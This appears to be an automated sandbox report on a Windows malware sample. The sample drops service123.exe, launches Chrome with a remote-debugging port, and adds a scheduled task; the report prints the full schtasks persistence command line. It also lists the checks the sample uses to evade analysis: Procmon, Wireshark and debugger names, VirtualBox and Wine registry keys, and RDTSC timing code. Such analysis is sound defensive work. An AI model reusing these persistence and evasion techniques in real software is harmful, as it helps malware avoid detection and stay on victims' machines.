Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2340,i,1016166225095006826,12192068235695981454,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rncminwlhbrejcomyvjl.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rncminwlhbrejcomyvjl.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rncminwlhbrejcomyvjl.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rncminwlhbrejcomyvjl.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rncminwlhbrejcomyvjl.dll Jump to behavior
Source: file.exe Static file information: File size 4479488 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x284400
Source: file.exe Static PE information: Raw size of bhovsmhv is bigger than: 0x100000 < 0x1bda00
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00058230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00058230
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x44e41e should be: 0x448d29
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: bhovsmhv
Source: file.exe Static PE information: section name: wzjavlmc
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: rnCMinwLHbrEjcomyVjl.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_0005A499 push es; iretd 8_2_0005A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C220C30 push eax; mov dword ptr [esp], edi 8_2_6C220DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1EED10 push eax; mov dword ptr [esp], ebx 8_2_6C1EEE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1C4E31 push eax; mov dword ptr [esp], ebx 8_2_6C1C4E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B8E7A push edx; mov dword ptr [esp], ebx 8_2_6C1B8E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1BA947 push eax; mov dword ptr [esp], ebx 8_2_6C1BA95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1EEAB0 push eax; mov dword ptr [esp], ebx 8_2_6C1EEBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1C2AAC push edx; mov dword ptr [esp], ebx 8_2_6C1C2AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1D8AA0 push eax; mov dword ptr [esp], ebx 8_2_6C1D909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1C0AA2 push eax; mov dword ptr [esp], ebx 8_2_6C1C0AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1F2BF0 push eax; mov dword ptr [esp], ebx 8_2_6C1F2F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1F2BF0 push edx; mov dword ptr [esp], ebx 8_2_6C1F2F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B8435 push edx; mov dword ptr [esp], ebx 8_2_6C1B8449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1D8460 push eax; mov dword ptr [esp], ebx 8_2_6C1D8A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B048B push eax; mov dword ptr [esp], ebx 8_2_6C1B04A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B04E0 push eax; mov dword ptr [esp], ebx 8_2_6C1B06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C191CFA push eax; mov dword ptr [esp], ebx 8_2_6C246622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C191CFA push eax; mov dword ptr [esp], ebx 8_2_6C246622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1BA5A7 push eax; mov dword ptr [esp], ebx 8_2_6C1BA5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1F2620 push eax; mov dword ptr [esp], ebx 8_2_6C1F2954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1F2620 push edx; mov dword ptr [esp], ebx 8_2_6C1F2973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C2006B0 push eax; mov dword ptr [esp], ebx 8_2_6C200A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B06A2 push eax; mov dword ptr [esp], ebx 8_2_6C1B06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B06A6 push eax; mov dword ptr [esp], ebx 8_2_6C1B06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1C86A1 push 890005EAh; ret 8_2_6C1C86A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B06FD push eax; mov dword ptr [esp], ebx 8_2_6C1B06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B66F3 push edx; mov dword ptr [esp], ebx 8_2_6C1B6707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1B070E push eax; mov dword ptr [esp], ebx 8_2_6C1B06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1BA777 push eax; mov dword ptr [esp], ebx 8_2_6C1BA78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1C0042 push eax; mov dword ptr [esp], ebx 8_2_6C1C0056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C18E0D0 push eax; mov dword ptr [esp], ebx 8_2_6C246AF6
Source: file.exe Static PE information: section name: bhovsmhv entropy: 7.954372038177193
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\rnCMinwLHbrEjcomyVjl.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: file.exe, 00000000.00000003.1682155579.0000000007C8E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161D4D3 second address: 161CD42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F3650C99D9Fh 0x0000000e push dword ptr [ebp+122D0A59h] 0x00000014 pushad 0x00000015 mov dword ptr [ebp+122D1DECh], edx 0x0000001b popad 0x0000001c call dword ptr [ebp+122D1C85h] 0x00000022 pushad 0x00000023 cmc 0x00000024 xor eax, eax 0x00000026 jmp 00007F3650C99DA0h 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f jmp 00007F3650C99DA9h 0x00000034 pushad 0x00000035 sub dword ptr [ebp+122D213Dh], ebx 0x0000003b mov dword ptr [ebp+122D213Dh], eax 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D2DD5h], eax 0x00000048 pushad 0x00000049 mov dword ptr [ebp+122D2064h], eax 0x0000004f jmp 00007F3650C99DA4h 0x00000054 popad 0x00000055 mov esi, 0000003Ch 0x0000005a jmp 00007F3650C99D9Dh 0x0000005f jmp 00007F3650C99DA3h 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 mov dword ptr [ebp+122D2064h], ecx 0x0000006e lodsw 0x00000070 or dword ptr [ebp+122D213Dh], ecx 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D20B4h], esi 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 mov dword ptr [ebp+122D1937h], edi 0x0000008a jne 00007F3650C99DADh 0x00000090 nop 0x00000091 push eax 0x00000092 push edx 0x00000093 js 00007F3650C99D98h 0x00000099 pushad 0x0000009a popad 0x0000009b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1780CE5 second address: 1780D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650BE6D83h 0x00000009 pop esi 0x0000000a jmp 00007F3650BE6D82h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jg 00007F3650BE6D76h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1780D19 second address: 1780D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1791EAD second address: 1791ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650BE6D84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1791ECC second address: 1791ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1792337 second address: 1792372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3650BE6D88h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 jp 00007F3650BE6D76h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007F3650BE6D7Ch 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793CAE second address: 1793CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793CB2 second address: 1793CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793CB8 second address: 1793CC2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3650C99D9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793CC2 second address: 1793CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793CD2 second address: 1793CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793CDB second address: 1793D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F3650BE6D78h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1DECh], eax 0x00000028 and edx, dword ptr [ebp+122D2E99h] 0x0000002e lea ebx, dword ptr [ebp+1244AB27h] 0x00000034 jng 00007F3650BE6D7Ch 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push edi 0x0000003f pop edi 0x00000040 jnp 00007F3650BE6D76h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793E26 second address: 1793E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793E2A second address: 1793E3F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3650BE6D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793E3F second address: 1793E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793E43 second address: 1793E49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793E49 second address: 1793E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793E4F second address: 1793E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1793E53 second address: 1793E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
